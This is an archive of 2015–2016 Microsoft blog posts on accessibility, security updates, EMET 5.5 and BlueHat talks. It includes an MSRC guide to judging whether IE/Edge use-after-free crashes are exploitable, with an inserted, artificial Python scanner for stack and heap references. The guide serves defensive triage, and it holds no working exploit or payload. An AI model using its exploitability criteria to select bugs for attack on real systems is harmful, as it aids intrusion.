Building a More Accessible Web Platform, 21 Apr 2016 22:00:38 +0000 In February the Edge team shared the roadmap for empowering all Microsoft Edge customers through accessibility and inclusive design. Today, we’re excited to share more about Microsoft Edge’s native support for the modern UI Automation accessibility framework, coming with the Windows 10 Anniversary Update. UI Automation enables Windows applications to provide programmatic information about their user interface to assistive technology products such as screen readers, and enables a comprehensive ecosystem. Read more about the updates on the Microsoft Edge Developer Blog.

April 2016 Security Update Release, 12 Apr 2016 10:00:43 +0000 Today we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.


Improvements to Narrator in Windows 10, 11 Apr 2016 21:50:03 +0000 In February, Jenny Lay-Flurrie, chief accessibility officer for Microsoft, reaffirmed our company-wide commitment to accessibility and outlined our guiding principles and goals to improve accessibility across our products, services and websites. In support of this commitment, the Windows team would like to share progress the team has made with respect to Narrator since the release of Windows 10 last summer.

What We’ve Learned

Since the release of Windows 10 we have heard lots of feedback through our Windows Insider program as well as through direct conversations with users of Assistive Technology (AT). This feedback has aligned to four key areas:

  1. Improve the accessibility of our new browser, Microsoft Edge.
  2. Improve support for common email scenarios with Windows Mail.
  3. Improve Narrator by increasing performance, reliability and usability.
  4. Improve the accessibility of Windows 10 experiences like the Start menu, the lock screen, Cortana, Store, Music, Videos and more.

The Edge and Mail teams have previously provided updates on their progress and priorities, which you can read about on their blogs. This post will focus on the work we are doing in support of improving Narrator. And in the coming months we will be sharing more about the improved accessibility of other Windows 10 experiences.

Improvements to Narrator

Today we are excited to share progress on improvements to Narrator focused on three main areas: performance, reliable reading and usability. Some of these updates can already be seen in the current pre-release builds available through the Windows Insider program, which you can join by visiting the Windows Insider site. Others will be included in upcoming builds made available through Windows Insider.
Improvements to expect in Narrator include:

Better Performance

  • Improved performance when navigating the start menu.
  • Significant performance improvements when typing.

More Reliable Reading

  • We have improved things like table navigation, resulting in a better reading and editing experience in apps like Windows Mail and Word.

  • Narrator will now read suggested results in apps like Cortana and Edge as well as suggested e-mail addresses in Outlook.
  • Keyboard commands in Narrator are now more familiar to users of other screen readers.
  • Some keyboard interactions have been simplified and updated to ensure better ergonomics, making them easier to type.

The following video gives a quick walkthrough of some of the improved keyboard interactions:

Other Investments

While much of our work aligns with our commitment to deliver a great in-box screen reading experience with Narrator, we also have longstanding relationships with our 3rd party screen reading partners. We firmly believe that the ecosystem of screen reading applications from vendors like Freedom Scientific, NV Access, AI Squared, Dolphin and Serotek will continue to deliver the most comprehensive set of access solutions for the blind and visually impaired. We are working together through regular technical discussions and collaboration to ensure they can support our primary Windows 10 apps and experiences.

We are also implementing a change in Narrator to help you choose the best possible experience when browsing the web. We recognize that some assistive technologies like Narrator may work better with Internet Explorer. With the April 2016 update for Windows 10, the first time you run Narrator you will be presented with the option to set Internet Explorer as the default web browser.

And finally, in addition to the work on Narrator, our documentation team has been working hard to update the resources available to those who are learning how to use Narrator. We are looking forward to providing improved and more complete documentation at the next public update for Windows 10.

Looking Forward

Microsoft is committed to making Windows 10 a great experience for all users and over the next few months we will continue to work on the performance, reliability and usability of tools designed for people with disabilities. We will also keep working on new features, like additional languages for Narrator, and will continue to post regular updates about our progress.

If you’re interested in providing help or suggestions, we would love to get your feedback via the Windows Insider Program or for technical support, contact the Microsoft Disability Answer Desk.

Seeing AI: New Technology Research to Support the Blind and Visually Impaired Community, 07 Apr 2016 18:23:01 +0000 Microsoft’s mission is to empower every person and every organization on the planet to achieve more, which includes creating and delivering technology for people of all abilities. As a part of this effort, last week at the Microsoft Build Conference, we debuted a new research project in development – Seeing AI – aimed at helping people who are visually impaired or blind to understand more about who and what is around them. Seeing AI will use computer vision, image and speech recognition, natural language processing and machine learning from Microsoft’s Cognitive Services and Office Lens to help describe a person’s surroundings, read text, answer questions and even identify emotions on people’s faces.

Seeing AI demo concept video

Seeing AI might be used either as a mobile app or via smart glasses from Pivothead. Although Seeing AI would not replace mobility aids such as guide dogs and canes, it will add another layer of information that could further enable people of all abilities to use technology in a more personal and enjoyable way.

This project was born out of last year’s //oneweek Hackathon, an event where Microsoft employees work together and try to make wild ideas a reality. Although Seeing AI is still in the development phase and not currently available, there has been tremendous progress on this initiative in a relatively short amount of time and we will definitely provide updates when we have more information to share.

We’re so excited to be working across the company and with others around the world to explore new opportunities that can help people of all abilities to achieve more. As always, we love your continued feedback and ideas as we keep working together to push the boundaries of what technology can do to empower every person on the planet.

Microsoft Bounty Programs Announce Expansion – Bounty for Microsoft OneDrive, 18 Mar 2016 00:19:38 +0000 At Microsoft, we continue to add new properties to our security bug bounty programs to help keep our customers secure. Today, I’m pleased to announce the addition of Microsoft OneDrive to the Microsoft Online Services Bug Bounty Program.

This addition further incentivizes security researchers to report service vulnerabilities to Microsoft. As part of the Microsoft Online Services Bug Bounty Program, the payouts will range from $500 – $15,000 USD.

Join us at the Microsoft Booth at CanSecWest 2016 in Vancouver, Canada to learn more about Microsoft OneDrive and the bounty programs. You can find the updated terms here. Send your submissions to

Happy Hunting,

Jason Shirk

Secure Development Blog, 17 Mar 2016 17:52:30 +0000 We’re proud to announce Secure Development at Microsoft, our developer focused security blog at Microsoft. The blog was created to inform developers of new security tools, services, open source projects and best development practices in order to help instill a security mindset across the development community and enable cross collaboration amongst its members.

Blog posts will be written by Microsoft engineers to give developers the right level of technical depth in order to get them up and running with integrating security assurance into their projects right away. We’ll cross reference their posts to make sure anyone following this blog can also check out the technical side of what we do.

Check them out!

Announcing Microsoft Sessions at CSUN Conference, 16 Mar 2016 18:00:23 +0000 Microsoft is pleased to be participating next week at the 31st Annual International Technology and Persons with Disabilities Conference (CSUN) in San Diego. On Wednesday March 23rd, we are hosting a number of educational sessions onsite to share information about the accessibility of our latest products including Windows 10 and Office 365, as well as to inspire dialog with some of our engineers and product managers. Below is our full schedule of session topics. If you are attending CSUN this year, we encourage you to join us for any or all of these talks. We look forward to connecting with you in San Diego.

Location: Pier Room, 3rd Floor of Harbor Tower

Session Schedule for Mar 23, 2016:

9:00 – 9:50am – Getting to know Windows 10
10:00 – 10:50am – Accessibility in Windows 10
11:00 – 11:40am – What’s New for Accessibility in Edge – Panel Discussion with Edge Accessibility Product Managers on plans and progress
11:40am – 1:20pm – Break for Lunch
1:20 – 2:10pm – Accessibility Enhancements in Office 365 – Panel Discussion with Microsoft Accessibility Product Managers on plans and progress
2:20 – 2:45pm – Accessibility Enhancements in Office 365 – Demonstrations by Microsoft Accessibility Experts with a variety of devices and assistive technologies
2:45 – 3:10pm – Learning Tools for OneNote – Overview of new, free tools that ease reading, writing and comprehension for everyone, including people with dyslexia
3:20 – 5:20pm – Round table discussions with Office 365 Accessibility Team – Bring your questions and suggestions!

March 2016 Security Update Release, 09 Mar 2016 10:00:08 +0000 Today we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates can be found in the Security TechNet Library.


Making Windows 10 and Office 365 more accessible: Our path forward, 24 Feb 2016 15:06:06 +0000 Accessibility is top of mind at Microsoft and two recent blog posts reflect this mindset. The first shares our corporate roadmap to improve accessibility and the second details progress and plans for accessibility in Office 365. As Chief Accessibility Officer Jenny Lay-Flurrie outlined, Microsoft has established three guiding principles on accessibility – transparency, accountability and inclusion.

The recent blogs, both the overarching corporate blog and the Office 365 blog, are aligned to our commitment to transparency. Our plans are aimed at delivering an experience that enables not just access, but also productivity. Within Windows 10, we will be working to improve commonly used features with showcase Windows experiences, improving browsing and reading experiences on Edge, providing a better screen-reader experience for Windows 10 mail and working on Narrator. For Office 365, we are focusing on making it easier to author accessible content, easier to use Office 365 with screen readers, enhancing the experience with apps in High Contrast Mode, introducing new tools that are beneficial to people with dyslexia and enabling everyone to use our applications in more intuitive ways.

There’s more in the blog posts, and I encourage you to check out the full details. We are committed to keeping our customers updated on our progress with future updates on this blog, and we look forward to getting your feedback and what matters most to you as we move forward.

Corporate Blog:
Office 365 Blog:

February 2016 Security Update Release Summary, 09 Feb 2016 10:00:00 +0000 Today we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.


Enhanced Mitigation Experience Toolkit (EMET) version 5.5 is now available, 02 Feb 2016 17:17:28 +0000 The Enhanced Mitigation Experience Toolkit (EMET) benefits enterprises and all computer users by helping to protect against security threats and breaches that can disrupt businesses and daily lives. It does this by anticipating, diverting, terminating, blocking, or otherwise invalidating the most common actions and techniques adversaries might use to compromise a computer. In this way, EMET can help protect your computer systems even from new and undiscovered threats before they are formally addressed by security updates and antimalware software.

Today we are pleased to announce the release of EMET 5.5, which includes the following new functionality and updates:

  • Windows 10 compatibility
  • Improved configuration of various mitigations via GPO
  • Improved writing of the mitigations to the registry, making it easier to leverage existing tools to manage EMET mitigations via GPO
  • EAF/EAF+ pseudo-mitigation performance improvements
  • Support for untrusted fonts mitigation in Windows 10

Mitigations in Windows 10

EMET was released in 2009 as a standalone tool to help enterprises better protect their Windows clients by providing an interface to manage built-in Windows security mitigations while also providing additional features meant to disrupt known attack vectors used by prevalent malware. Since that time, we have made substantial improvements to the security of the browser and the core OS. With Windows 10 we have implemented many features and mitigations that can make EMET unnecessary on devices running Windows 10. EMET is most useful to help protect down-level systems, legacy applications, and to provide Control Flow Guard (CFG) protection for 3rd party software that may not yet be recompiled using CFG.

Some of the Windows 10 features that provide equivalent (or better) mitigations than EMET are:

Device Guard: Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications. Device Guard provides hardware-based zero day protection for all software running in kernel mode, thus protecting the device and Device Guard itself from tampering, and app control policies that prevent untrusted software from running on the device.

Control Flow Guard (CFG): As developers compile new apps, CFG analyzes and discovers every location that any indirect-call instruction can reach. It builds that knowledge into the binaries (in extra data structures – the ones mentioned in a dumpbin/loadconfig display). It also injects a check, before every indirect-call in your code, that ensures the target is one of those expected, safe locations. If that check fails at runtime, the operating system closes the program.

AppLocker: AppLocker is an application control feature introduced in Windows 7 that helps prevent the execution of unwanted and unknown applications within an organization's network while providing security, operational, and compliance benefits. AppLocker can be used in isolation or in combination with Device Guard to control which apps from trusted publishers are allowed to run.

For more information on Windows 10 security features please review the Windows 10 Security overview whitepaper on TechNet.

EMET 5.5 and Edge

Given the advanced technologies used to protect Microsoft Edge, including industry leading sandboxing, compiler, and memory management techniques, EMET 5.5 mitigations do not apply to Edge.


For support using EMET 5.5, please visit


The EMET team

Triaging the exploitability of IE/EDGE crashes, 12 Jan 2016 14:27:00 +0000 Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost for attackers to develop a working exploit.

Because of these changes, determining the exploitability of crashes has become increasingly complicated, as the effect of these mitigations must be taken into account during analysis. We have received a number of requests from the security community for clarification on how these mitigations affect exploitability. To ensure that only valid issues are submitted, we thought it may be useful to offer some guidance.


Use after free mitigations

Use-after-free (UAF) is a common type of vulnerability in modern object-oriented software. It occurs when an instance of an object is freed while a pointer to the object is still kept by the program. Since the object instance has been freed, this pointer is dangling, pointing to unmapped memory. Such a vulnerability is exploitable when the unmapped memory is controllable by an attacker, and will be used when the dangling pointer is later dereferenced by the program. We can split UAF vulnerabilities into three classes based upon where the dangling pointer is stored: the stack, the heap, and the registers.

We have developed two primary mitigations to protect against UAFs:

  • Memory Protector (MP) [IE10 and below]

MP is designed to protect objects against UAFs where the reference is stored on the stack, or in a register.

  • MemGC [Edge & IE11]

MemGC is a new replacement for MP, currently enabled on Edge and IE11. Protected objects are only freed when no references exist on the stack, heap or registers, offering complete coverage.


Exploitability & Servicing

MemGC [Edge & IE11]

  • We consider UAFs that are addressed by MemGC strongly mitigated, and will not issue a security update for them.
  • The only exception for this are rare cases where zero writing the object leads to an exploitable state, although we have yet to see an occurrence of this.

Memory Protector [IE10 and below]

  • We consider stack and register based UAFs strongly mitigated and will not issue a security update for them, except in the circumstances explained below.
  • Heap reference based UAFs are not mitigated by MP, and so will still be addressed via a security update.


Triaging crashes

Memory protector

Memory protector (MP) is a mitigation first introduced in July 2014 initially for all supported versions of Internet Explorer, but now only applies to IE 10 and below. It is designed to mitigate a subset of use-after-free vulnerabilities, due to dangling pointers stored on the stack or the registers. At a high level, it works as follows:

  1. When delete is called on an object instance, its contents are zeroed, and it is placed in a queue. Once the queue has reached a threshold size, we then begin the process of seeing if it is safe to free each object instance in the queue.
  2. To test whether it is safe to free an object instance, we scan both the registers and all pointer-aligned stack entries to see if there exists a pointer to the object. If no pointer is found then the object is freed, otherwise the object is kept in the queue.

Part (1) of the algorithm only delays the potential freeing of the object to a later point in time; that delay is controllable by an attacker (for example, by driving enough deletes to fill the queue), and as such it is not considered a security mitigation.

To make it easier to determine the exploitability of these issues, MP has a mode called “Stress Mode”. Under this mode the delayed free component (1) of MP is disabled: stack/register scanning happens on every free, rather than when the queue has reached a threshold length. It can be enabled with the registry key:

HKLM:/Software/Microsoft/Internet Explorer/Main/Feature Control/FEATURE_MEMPROTECT_MODE/iexplore.exe DWORD 2

(note that this key, and “Stress Mode” are only applicable to MP, not MemGC).

Example crash

With the delayed free component of MP now disabled by forcing the object instance to be freed at the earliest possible instant, we can now concentrate on determining exploitability, based on Part (2), as shown by an illustrative example below:

In this case, we have a use-after-free vulnerability causing a near-null dereference. Tracing backwards, we can see that the value of eax was set a few instructions previously:

If we look at this object in memory, we see that it has been zeroed, and by checking the PageHeap End Magic we can see that this heap chunk is still allocated under Stress Mode:

Now we need to see if there are any stack references to this object instance, starting at the call frame when delete was called. This can be completed using windbg scripting: for example, scanning for references to an object with base address stored in ebx with size 0x30:


Checking stack reference locations with MP

In this case, we find a single reference to the object instance on the stack. With this information we must now check to see which call frame contains this reference.

Here, we show an example call stack at the point when the object is deleted:

If there is a reference to an object instance on the stack or registers, then MP will never free the object instance. Thus, if between the point delete is first called in frame_2 until the point when we crash with a near null dereference in frame_5 there is always a stack reference, the object instance cannot be freed and reallocated/controlled by an attacker.

In this example, the reference we found by scanning the stack (at 0x1024ae9c) is stored in frame_8. Since this reference is present all of the time between the freeing point in frame_2 and the crashing point in frame_8, we consider this case not exploitable, since it is strongly mitigated by MP.

Two other main situations can also occur:

  1. If (for example) the stack reference was in frame_3 rather than frame_8, then there is a period between the freeing of the object and the crashing point when there are no stack references. This case may be exploitable since if the code path between these points can be slightly altered to force another call to delete, we will be left with an exploitable situation.
  2. When running under stress mode, the crash may now occur on a freed block since the delayed free component is disabled (usually due to the reference being stored on the heap). Under this circumstance, the case would be generally exploitable.


MemGC is a new replacement for MP, currently available in Edge and all supported versions of IE11, and mitigates use-after-free vulnerabilities in a similar fashion to MP. However, it also offers additional protection by scanning the heap for references to protected object types, as well as the stack and registers. MemGC zeroes the object upon free and delays the actual free until garbage collection is triggered and no references to the freed object are found.

Just like with MP, mitigated use-after-free vulnerabilities will most likely result in a near-null pointer dereference or occasionally in no crash at all. If you suspect that a near-null pointer dereference is actually a mitigated use-after-free vulnerability you can verify this with the following steps:

  • Find the position where the near-null value is read, determining the base pointer of the object:

If we dump the object, we can see that it has been zeroed as before:

  • Trace back and find the allocation call stack for this chunk, using the base pointer that was found in the first step. If the object is allocated with edgehtml!MemoryProtection::HeapAlloc() or edgehtml!MemoryProtection::HeapAllocClear() it means that the object is tracked by MemGC e.g.

Similarly, when the object is freed, it will be via edgehtml!MemoryProtection::HeapFree() e.g.

To double check that the issue is successfully mitigated, we can scan for references to the object on both the heap and stack.

For scanning the stack, we can use the same technique as described in the Memory Protector section. We can then use the same criteria as described above to determine exploitability; if there exists a stack reference between the freeing point and crashing point, we consider it strongly mitigated by MemGC.

When scanning the heap, we use a similar method, by first scanning the heap for references with values between the base pointer and basepointer+object_size of the object we are interested in. If any references are found, we then just need to check to see what objects they are associated with. If the object containing the reference is also tracked by MemGC (i.e. allocated via HeapAlloc() or HeapAllocClear()), then MemGC will not free the object we are interested in, so we consider it strongly mitigated by MemGC.

In this example, if we use the stack scanning command from above, we see that there is a reference on the stack preventing the object from being freed between the deletion and crashing points, making it successfully mitigated by MemGC.
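The stack and heap scans described in the Memory Protector and MemGC sections above, as an added example that is not part of the original post and does not reproduce its windbg scripts: pure Python over a constructed memory snapshot. `find_references` does what the post's scan does for any region (pointer-aligned slots holding a value inside [base, base+size)); `triage_stack_refs` applies the frame rule from the Memory Protector section, and `heap_refs_keep_alive` applies the MemGC rule that only references inside MemGC-tracked objects pin the victim object. The object base, stack layout and heap contents are constructed (the object size 0x30 and the hit address 0x1024ae9c follow the post); the frame rule assumes, as in the post's example, that frames are numbered outward from the innermost and that the crashing frame is a caller of the freeing frame.

```python
import struct
from dataclasses import dataclass

PTR_SIZE = 4  # the post's example is a 32-bit IE process (eax/ebx)


def find_references(region, region_base, obj_base, obj_size, ptr_size=PTR_SIZE):
    """Addresses of pointer-aligned slots in `region` whose value falls inside
    [obj_base, obj_base + obj_size). The same scan serves the stack (what MP
    checks) and the heap (what MemGC additionally checks)."""
    fmt = "<I" if ptr_size == 4 else "<Q"
    hits = []
    for off in range(0, len(region) - ptr_size + 1, ptr_size):
        (val,) = struct.unpack_from(fmt, region, off)
        if obj_base <= val < obj_base + obj_size:
            hits.append(region_base + off)
    return hits


@dataclass
class Frame:
    name: str
    lo: int        # lowest stack address owned by the frame
    hi: int        # one past the highest


@dataclass
class HeapObject:
    base: int
    size: int
    memgc_tracked: bool   # allocated via MemoryProtection::HeapAlloc/HeapAllocClear


def frame_index_of(addr, frames):
    """Index of the frame owning `addr`, or -1 if it is outside every frame."""
    for i, f in enumerate(frames):
        if f.lo <= addr < f.hi:
            return i
    return -1


def triage_stack_refs(stack_hits, frames, free_frame_idx, crash_frame_idx):
    """The post's rule: a stack reference in a frame that stays live from the
    delete call until the crash means the object is never freed. Assumption:
    frames are numbered outward from the innermost and the crashing frame is
    a caller of the freeing frame, so any frame at or outside the crashing
    frame is live for the whole window."""
    if not stack_hits:
        return "no stack reference: a crash on a freed block is generally exploitable"
    outer = max(free_frame_idx, crash_frame_idx)
    if any(frame_index_of(a, frames) >= outer for a in stack_hits):
        return "strongly mitigated: a reference outlasts the free-to-crash window"
    return "may be exploitable: every stack reference is dropped before the crash"


def heap_refs_keep_alive(heap_hits, heap_objects):
    """MemGC honours only references that live inside objects it tracks."""
    return any(o.memgc_tracked and o.base <= a < o.base + o.size
               for a in heap_hits for o in heap_objects)


# ---- constructed snapshot (not captured from a real process) ----
OBJ_BASE, OBJ_SIZE = 0x0A1B2C30, 0x30   # size 0x30 as in the post; base is made up
STACK_BASE = 0x1024AE00                  # chosen so the hit lands at 0x1024ae9c
STACK = bytearray(0x100)
struct.pack_into("<I", STACK, 0x9C, OBJ_BASE + 0x10)      # interior pointer: a reference
struct.pack_into("<I", STACK, 0x20, OBJ_BASE + OBJ_SIZE)  # one past the end: not one
struct.pack_into("<I", STACK, 0x30, OBJ_BASE - 4)         # just below: not one
FRAMES = [Frame(f"frame_{i}", STACK_BASE + i * 0x10, STACK_BASE + (i + 1) * 0x10)
          for i in range(8)] + [Frame("frame_8", STACK_BASE + 0x80, STACK_BASE + 0x100)]

HEAP_BASE = 0x0A1B3000
HEAP = bytearray(0x40)
struct.pack_into("<I", HEAP, 0x08, OBJ_BASE)              # reference inside a tracked object
HEAP_OBJECTS = [HeapObject(HEAP_BASE, 0x20, memgc_tracked=True),
                HeapObject(HEAP_BASE + 0x20, 0x20, memgc_tracked=False)]


def run_triage():
    """Scan both regions and return the verdicts as a dict."""
    stack_hits = find_references(STACK, STACK_BASE, OBJ_BASE, OBJ_SIZE)
    heap_hits = find_references(HEAP, HEAP_BASE, OBJ_BASE, OBJ_SIZE)
    return {
        "stack_hits": stack_hits,
        "stack_frames": [FRAMES[frame_index_of(a, FRAMES)].name for a in stack_hits],
        "mp_verdict": triage_stack_refs(stack_hits, FRAMES, free_frame_idx=2, crash_frame_idx=8),
        "heap_hits": heap_hits,
        "memgc_heap_keeps_alive": heap_refs_keep_alive(heap_hits, HEAP_OBJECTS),
    }


if __name__ == "__main__":
    for k, v in run_triage().items():
        print(k, v if not isinstance(v, list) else [hex(x) if isinstance(x, int) else x for x in v])
```

Moving the hit into frame_3 (the post's first alternative scenario) flips the verdict to "may be exploitable", and an empty hit list with a crash on the freed block gives the second scenario; both are covered by `triage_stack_refs` without touching the scanner.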


In conclusion, these new mitigations dramatically enhance security by making sets of use-after-free vulnerabilities non-exploitable. When triaging issues in both IE & Edge, the behavior of these mitigations needs to be taken into account in order to determine the exploitability of these issues.


We would like to thank the following people for their contribution to this post:

Chris Betz, Crispin Cowan, John Hazen, Gavin Thomas, Marek Zmyslowski, Matt Miller, Mechele Gruhn, Michael Plucinski, Nicolas Joly, Phil Cupp, Sermet Iskin, Shawn Richardson and Suha Can

Stephen Fleming & Richard van Eeden. MSRC Engineering, Vulnerabilities & Mitigations Team.

January 2016 Security Update Release Summary, 12 Jan 2016 10:14:40 +0000 Today we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.


BlueHat v15 Announces Schedule and Registration, 18 Nov 2015 13:14:00 +0000 As we inch closer to the 15th BlueHat Security Conference, we are happy to announce the lineup of speakers and topics for this event. This year will continue with a solid speaker and topic selection that engages engineers, executives, and invited guests to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

BlueHat is set for Tuesday, January 12th through Wednesday, January 13th at Microsoft’s Redmond campus. The first day will set the stage of the threat environment and what is impacting customers today. The second day splits into four simultaneous tracks (two in the morning and two in the afternoon) focusing on protecting customers and defense strategy, pivoting to help customers, software/service development, and attacks/exploits in the wild.

External invites have been sent and registration is now open for BlueHat v15. We look forward to another great conference.


Tuesday, January 12th, 2016 | General Audience


9:00-9:50 AM | Ofir Arkin | Intel
Keynote: Security in a World Out of Our Control

The traditional security models are failing as they become obsolete in a world where the environment and technology are constantly changing and advancing. The need to allow anywhere anytime access (Mobility) to enterprise resources from any user (Collaboration), and any device (BYOD), has challenged the mere existence of the fixed perimeter and the traditional defense mechanisms. In a world where IT is losing control over devices, users and even its own infrastructure a new security model, that takes into account these new realities, must be put in place.


10:00-10:50 AM | Nick Carr and Matthew Dunwoody | Mandiant
No Easy Breach: Challenges and Lessons from One of Mandiant's Most Demanding Investigations

Every IR presents unique challenges. But – when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day – the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.

11:00-11:50 AM | Shawn Loveland | Microsoft
The Business of Cybercrime

Just as the PC/computer/mobile device ecosystem has grown over the decades, so has the cybercrime industry, which today is more organized and motivated than at any time in history. Blackhat cybercrime is a form of malicious online behavior motivated by profit and a predictable ROI. Treating Blackhat cybercrime as a purely technological problem makes mitigation difficult, costly, and ineffective. By understanding the attacker’s Tools, Techniques, Motivations, and Business Models, we can understand how our products, services, and users are, and will be, victimized by Blackhat Cybercriminals.


1:00-1:50 PM | Daniel Edwards | Microsoft
HoneyPots & Deception – What is happening to our Azure customers?

The theme of the talk this year will be about my experiments in running a honeypot in Azure, what I learned, how the information can be used to improve protection and a call to action. The PowerPoint is a very basic outline meant to convey the theme of the talk. I just haven’t had a chance to create all the diagrams but I already have all the data (and continue to collect additional data every day) that I am talking to. The word document is a sample of the analysis that I will be incorporating.

2:00-2:50 PM | Alex Weinert and Dana Kaufman | Microsoft
A Year in the Trenches with Microsoft Identity Protection team

Between Microsoft account, Microsoft’s consumer system which supports Outlook, Xbox, OneDrive, and more; and Azure Active Directory, which supports virtually all enterprise identity deployments, Microsoft’s Identity team supports more than 2B identities in every market and services over 14B logins every day. The Identity Protection team is responsible for ensuring that access is granted only to account owners, and that those account owners are not fraudsters. In this session, we’ll provide an overview of the protection systems in play, how we see fraudsters adapting to those systems, and industry trends in a world where the high stakes attacks meet high tech adaptive countermeasures. We’ll punctuate the talk with a few scary stories from the front lines, and our forecast for the future of identity protection.

3:00-3:50 PM | Jonathan Birch | Microsoft
Unintended Authentication

Unintended authentication to untrusted services is a common but largely ignored problem in Windows applications. In this talk, I explain how this type of vulnerability occurs and why its potential and current exploitation create a risk that application developers should work immediately to mitigate. To give reference examples, I discuss two cases where this type of vulnerability occurred and was fixed in Microsoft Office. Finally, I demonstrate how to test for and fix unintended authentication problems and best practices that can be used to prevent them from being introduced into a product.

4:00-4:50 PM |Matt Graeber | Veris Group        
Windows Management Instrumentation – The Omnipresent Attack and Defense Platform

A resourceful attacker seeking to maximize his or her compromise/effort ratio will naturally target any omnipresent technology present in a homogeneous environment. Windows Management Instrumentation (WMI) is one such technology that is present and listening on every Windows operating system dating back to Windows 95. WMI is a powerful remote administration technology used to get/set system information, execute commands, and perform actions in response to events. While it is a well-known and heavily used technology by diehard Microsoft sysadmins, attackers (i.e. diehard unintended sysadmins) find such built-in technology enticing, especially those who wish to maintain a minimal footprint in their target environment. In reality, targeted and criminal actors are making heavy use of WMI in the wild and defenders need to be informed of its capabilities both from an offensive and defensive perspective. This talk aims to inform the audience of the basics of WMI, in the wild attacks, theoretical attack scenarios, and how defenders can leverage the WMI eventing system against an attacker.

Wednesday, January 13th, 2016 | General Audience 

TRACK 1 – DEVELOPMENT                         

9:00-9:50 AM | Lee Holmes |Microsoft
Attackers Hunt Sysadmins. It's time to fight back

What do the NSA, APT groups, and run-of-the-mill attackers have in common? They. Hunt. Sysadmins. After all, what’s a better way to compromise an entire infrastructure than to target the folks with complete and unconstrained access to it? It’s time to fight back. In this talk, we introduce PowerShell Just Enough Administration, a powerful platform capability that lets you add role-based access controls to your existing PowerShell-based remote management infrastructure.

10:00-10:50 AM | Laura Bell | SafeStack              
Protecting our people (The Awkward Border)

People are problematic when it comes to security. We all know and laugh about the ease with which we can lie, cheat and steal from those around us whilst stubbornly refusing to admit that the same scams would probably work on us too. A culture of fear and negative consequences spanning decades has given us a workforce that is not only scared of being attacked, but scared of saying something if they see a threat or do something wrong.

So how do we change this? Can we enable, empower and engage _all_ of our people to protect themselves and those around them? More importantly can we do this without destroying privacy or putting those people at risk? This isn't a sales pitch. This isn't a miracle cure. This is the story of trying to protect our people and the difficult road to achieving this.

11:00-11:25 AM | Shawn Hernan | Microsoft
Factor-and-a-half Authentication

Many traditional techniques for protecting the stored representation of passwords derive their security by making the password verification operation expensive. For example, a server may hash a password many times as a way to slow down brute-force attacks against an offline copy of the password database. In such a scheme, acceptable password security may result in unacceptably poor login-time performance. Memory-intensive functions like scrypt may not scale well on a server that has to support a large number of simultaneous login attempts. Multi-factor authentication schemes provide protection against many of the common problems that plague reusable passwords. Unfortunately, adoption rates for MFA are low in general, and many of the systems are expensive or suffer from usability issues. This talk proposes an authentication system, “factor-and-a-half authentication,” to address some of these problems. Factor-and-a-half authentication consists of “something you know” and “something you create,” along with initial setup and verification protocols and policy management between clients and server.

11:30-11:55 AM | Scott Longheyer | Microsoft 
Network Defense- Isolation Enforcement

Some things are meant to be shared, some are not. From dedicated to software-defined networks, we discuss modern solutions to enforce network isolation in extremely dynamic, often exposed, single or multi-tenant hosting environments. The tools are getting better, let’s wield them. Network certifications are not required to attend.

TRACK 2 – Pivoting to Help Customers                                     

1:00-1:50 PM | Amit Hilbuch |Microsoft             
Early Detection of Fraud Storms in the Cloud

Cloud computing resources are sometimes hijacked for fraudulent use. While some fraudulent use manifests as small-scale resource consumption, a more serious type of fraud is that of fraud storms, which are events of large-scale fraudulent use. These events begin when fraudulent users discover new vulnerabilities in the sign-up process, which they then exploit en masse. The ability to perform early detection of these storms is a critical component of any cloud-based public computing system.

In this work we analyze telemetry data from Microsoft Azure to detect fraud storms and raise early alerts on sudden increases in fraudulent use. The use of machine learning approaches to identify such anomalous events involves two inherent challenges: the scarcity of these events, and at the same time, the high frequency of anomalous events in cloud systems. We compare the performance of a supervised approach to the one achieved by an unsupervised, multivariate anomaly detection framework. We further evaluate the system performance taking into account practical considerations of robustness in the presence of missing values, and minimization of the model’s data collection period. This work describes the system, as well as the underlying machine learning algorithms applied. A beta version of the system is deployed and used to continuously control fraud levels in Azure.

2:00-2:50 PM | Christiaan Beek | Intel Security
There’s A Pot of Gold at The End of the Ransomware Rainbow

Ransomware is one of the threats we have seen rising over the past few years, with a huge resurfacing in 2014. Mostly the Windows platform, but also Linux, mobile and OS X operating systems, are being targeted by these campaigns. In this presentation, we will start with an overview of the different crypto-ransomware we have seen in the past couple of years, combined with some of the technical developments in the industry that assisted in making this business model very lucrative. We continue with some examples of in-depth analysis of behavior patterns we discovered in certain families that helped us identify and classify them. Besides the malware itself we will highlight some insights around how the actors in general are operating, the infrastructure they build up, the financial infrastructure, the profit and connections with other cybercrime operations.

3:00-3:50 PM | Jasika Bawa, Costas Boulis, and Roman Porter | Microsoft
Advancing SmartScreen To Disrupt The Exploit Kit Economy

Microsoft SmartScreen integrated with Internet Explorer, Microsoft Edge, and Windows, has helped protect users from socially engineered attacks such as phishing and malware downloads since the release of Internet Explorer 7. Over time, SmartScreen reputation checks on URLs and SmartScreen Application Reputation protection in the browser and in Windows have significantly changed the socially engineered attack landscape, leaving such attacks at historic lows. However, attackers have continued to adapt—enter Exploit Kits (EKs), one of the fastest growing threats online.

